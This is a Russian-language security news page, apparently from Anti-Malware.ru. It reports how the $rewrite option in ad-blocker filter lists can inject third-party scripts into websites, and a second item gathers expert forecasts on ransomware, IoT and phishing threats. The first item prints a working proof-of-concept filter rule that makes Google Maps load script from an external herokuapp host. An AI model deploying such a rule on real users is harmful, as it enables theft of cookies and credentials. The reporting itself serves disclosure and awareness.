Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Новый эксплойт, недавно обнаруженный экспертом в области кибербезопасности, способен использовать фильтры популярных блокировщиков рекламы Adblock Plus, AdBlock и uBlocker для инъекции сторонних скриптов в код страниц веб-сайтов.

Adblock Plus, AdBlock и uBlocker представляют собой специальные расширения для браузеров, помогающие пользователям скрывать надоедливую и агрессивную рекламу со страниц ресурсов.

База пользователей этих блокировщиков насчитывает более 10 миллионов человек. Таким образом, если злоумышленнику удастся внедрить вредоносные скрипты, он получит возможность красть файлы cookie, учетные данные, а также осуществлять нужные ему редиректы.

Работа блокировщиков рекламы завязана на использовании списка URL, на которых был отмечен рекламный контент или даже вредоносное поведение. Тот же Adblock Plus, например, запрещает браузеру подключаться к этим ссылкам, следовательно, рекламные скрипты не в состоянии загрузиться.

Вся проблема кроется в опции списка фильтров под названием $rewrite, которая была представлена в 2018 году (в Adblocker Plus 3.2). Эта функция позволяет разработчику подменить запрос, совпадающий с определенным регулярным выражением, другим URL.

Единственное условие — заменяемая строка должна быть относительным URL-адресом. Таким образом, если запрос для example.com/ad.gif заменить на example.com/puppies.gif, пользователь вместо рекламы увидит картинку с милыми щенками.

При этом разработчики предусмотрели защиту, запретив запросы вида SCRIPT, SUBDOCUMENT, OBJECT и OBJECT_SUBREQUEST — с ними эта функция не будет работать.

Однако исследователь Армин Себастьян нашел способ, позволяющий создать правило, благодаря которому сторонний скрипт можно встроить в контент конкретного сайта.

Для этого потребуется найти ресурс, который допускает загрузку скриптов со сторонних доменов, а также использует XMLHttpRequest или Fetch для загрузки скриптов. Сам Себастьян довольно быстро нашел такой ресурс — он использовал Google Maps для демонстрации уязвимости.

Google Maps использует XMLHttpRequest для загрузки скриптов, что позволило эксперту воспользоваться функцией фильтров $rewrite для задействования скрипта со стороннего домена. Пример:

/^https://www.google.com/maps/_/js/k=.*/m=pw/.*/rs=.*/$rewrite=/search?hl=en-US&source=hp&biw=&bih=&q=majestic-ramsons.herokuapp.com&btnI=I%27m+Feeling+Lucky&gbv=1

Если пользователь в этом случае посетит google[.]com/maps/, фильтр использует редиректы Google для считывания контента с majestic-ramsons.herokuapp[.]com/.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Атаки на IoT, шифровальщики, ИИ, фишинг: что нас ждёт в ближайшие годы

Эксперты в области кибербезопасности из компаний Qrator Labs, BI.ZONE, InfoWatch, «Ростелеком» и «Лаборатория Касперского» поделились своими прогнозами в отношении кибератак. По мнению специалистов, в ближайшие годы нас ждут кампании операторов шифровальщиков, а также кибератаки на системы «Интернета вещей» (IoT).

В Qrator Labs отметили, что основные киберугрозы неразрывно связаны с человеческим фактором — нашими ошибками, которые мы совершаем по наивности, а также с растущей сложностью информационных систем.

Артем Гавриченков, технический директор Qrator Labs, напомнил, что до атак WannaCry и NotPetya программы-вымогатели оставались фактически на галёрке. Сегодня же от этого вида вредоносов страдают крупные корпорации и даже правительства.

Специалисты BI.ZONE разделяют эту точку рения, обращая также внимание на крупные суммы выкупа, которые начали запрашивать операторы шифровальщиков в 2020 году. В отдельных случаях это могут быть миллионы долларов. Евгений Волошин из BI.ZONE считает, что эти суммы будут только расти.

Андрей Арсентьев, аналитик из ГК InfoWatch, отметил участие искусственного интеллекта и машинного обучения в дальнейшей эволюции киберугроз. Например, невероятно мощные квантовые компьютеры могут стать причиной взлома всех систем шифрования данных.

Помимо этого, Арсентьев призывает не забывать о фишинге и всё более изощрённых методах социальной инженерии. По мнению специалиста, киберпреступники продолжат использовать актуальные темы для введения своих жертв в заблуждение.

Артем Кильдюшев, анализирующий киберугрозы в Solar JSOC («Ростелеком»), считает, что целевые атаки также заслуживают внимания. Злоумышленники стали тщательнее продумывать такие операции, а их целями всё чаще выступают инфраструктуры важных компаний.

В «Лаборатории Касперского» указали на использование в атаках уязвимостей нулевого дня (0-day). Цена таких эксплойтов, как правило, может достигать миллиона долларов. Однако Борис Ларин из «Лаборатории Касперского» уточнил, что за последние два года удалось выявить больше десяти таких эксплойтов.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru